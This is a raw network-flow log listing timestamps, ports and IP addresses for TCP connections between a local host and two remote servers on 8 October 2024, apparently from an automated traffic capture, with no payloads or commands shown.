Oct 8, 2024 20:47:29.907116890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907129049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907130003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907140970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907147884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907152891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907165051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907165051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907181978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907203913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907219887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907732010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907742977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907752991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907768011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907778978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907780886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907790899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907799959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907803059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907814980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907819033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907825947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907838106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907838106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907849073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907860041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907862902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907872915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907882929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.907890081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907907963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.907922029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908348083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908358097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908370972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908382893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908394098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908396006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908413887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908418894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908426046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908435106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908437014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908448935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908458948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908459902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908472061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908482075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908484936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908499956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908507109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908510923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908523083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908524036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908535004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908546925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908546925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908559084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908570051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908574104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908580065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.908591986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.908610106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909311056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909322977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909333944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909346104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909358025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909359932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909368992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909380913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909380913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909393072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909399033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909413099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909418106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909425020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909435987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909441948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909450054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909461021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909462929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909473896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909487009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909488916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909501076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909507990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909512043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909523964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909524918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909535885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909549952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909554958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909559011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.909578085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.909595013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.928204060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.928255081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.928266048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.928390980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.928390980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.928436995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.928447962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.928459883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.928472042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.928489923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.928508043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.931885004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.931895018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.931905985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.931938887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.931941986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.931952953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.931953907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.931965113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.931974888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:29.931982040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.932001114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.932025909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:29.932463884 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.933165073 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.933222055 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.933264971 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.933279991 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.933293104 CEST	49817	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.933300972 CEST	443	49817	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.936925888 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.936945915 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.937012911 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.937179089 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.937186956 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.968080997 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.968559980 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.968580961 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:29.969032049 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:29.969041109 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.397206068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397232056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397244930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397352934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397363901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397373915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397384882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397407055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397408009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397408009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397444963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397669077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397703886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397737980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397753000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397770882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397784948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397804976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397819042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397838116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397854090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397874117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397881985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397907972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397914886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397942066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.397954941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.397988081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398454905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398488045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398509979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398520947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398534060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398555994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398566961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398588896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398602962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398634911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398642063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398674965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398689032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398710012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398719072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398742914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398755074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398776054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398788929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398809910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398822069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398843050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398855925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398876905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398888111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398911953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398924112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398943901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398957968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.398978949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.398992062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.399013042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399028063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.399046898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399058104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.399080992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399091959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.399116993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399125099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.399163008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.399861097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399910927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399945021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399961948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.399977922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.399986982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400015116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400021076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400047064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400057077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400080919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400087118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400114059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400121927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400146961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400152922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400178909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400187016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400213957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400218964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400245905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400254011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400279045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400288105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400314093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400320053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400346994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400353909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400381088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400386095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400413990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400422096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400448084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400456905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400480986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400485992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400513887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400522947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400552988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400918961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400953054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400968075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.400985956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.400994062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.401021957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.401026964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.401057005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.401057959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.401096106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.401184082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.401225090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.401427031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.401473999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.401530027 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.401588917 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.401983023 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.402086973 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.402086973 CEST	49818	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.402132034 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.402158022 CEST	443	49818	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.404916048 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.404951096 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.405030012 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.405160904 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.405167103 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.408679962 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.409454107 CEST	49819	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.409475088 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.409951925 CEST	49819	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.409956932 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.424065113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.732877016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.735873938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.735925913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.737812042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.840349913 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.840502024 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.840662003 CEST	49819	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.840698004 CEST	49819	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.840713978 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.840727091 CEST	49819	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.840732098 CEST	443	49819	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.843622923 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.843710899 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.843797922 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.843925953 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.843946934 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.923945904 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.924535036 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.924596071 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.925024033 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.925036907 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.928405046 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.928662062 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.928700924 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.928982973 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.928994894 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.935920000 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.936327934 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.936352968 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.936846018 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:30.936851025 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:30.938584089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938635111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938646078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938668013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.938697100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.938715935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938725948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938735008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938750982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938759089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.938775063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.938802004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.938832045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938843012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938854933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938879967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.938900948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.938967943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938977957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938987017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.938997984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939026117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939049006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939119101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939130068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939140081 CEST	80	49755	95.164.90.97	192.168.2.5
